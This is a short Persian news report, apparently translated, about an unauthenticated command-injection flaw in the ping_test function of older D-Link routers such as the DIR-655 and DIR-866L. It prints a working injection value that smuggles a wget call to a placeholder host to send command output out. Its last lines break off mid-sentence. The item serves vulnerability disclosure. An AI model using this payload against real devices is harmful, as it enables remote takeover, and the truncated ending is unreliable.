در روترهای بی سیم D-Link
جالب توجه است که به گفته توسعه دهندگان سیستم عامل، فراخوانی "ping_test" باید فقط پس از احراز هویت اجرا شود، اما در واقع در هر صورت، بدون توجه به ورود به رابط وب، فراخوانی می شود. به طور خاص، هنگام دسترسی به اسکریپت apply_sec.cgi و پاس کردن پارامتر "action=ping_test"، اسکریپت به صفحه احراز هویت هدایت می شود، اما در همان زمان عمل مرتبط با ping_test را انجام می دهد. برای اجرای کد، آسیب پذیری دیگری در خود ping_test استفاده شد که بدون بررسی صحیح صحت آدرس IP ارسال شده برای آزمایش، ابزار ping را فراخوانی می کند. به عنوان مثال، برای فراخوانی ابزار wget و انتقال نتایج فرمان “echo 1234” به یک میزبان خارجی، کافیست پارامتر “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// را مشخص کنید. test.test/?$( echo 1234)".
وجود این آسیب پذیری در مدل های زیر به طور رسمی تایید شده است:
- DIR-655 با سیستم عامل 3.02b05 یا قدیمی تر؛
- DIR-866L با سیستم عامل 1.03b04 یا بالاتر.
- DIR-1565 با سیستم عامل 1.01 یا بالاتر.
- DIR-652 (هیچ اطلاعاتی در مورد نسخه های سیستم عامل مشکل دار ارائه نشده است)
دوره پشتیبانی برای این مدل ها قبلاً به پایان رسیده است، بنابراین D-Link
بعداً مشخص شد که این آسیبپذیری نیز وجود دارد
منبع: opennet.ru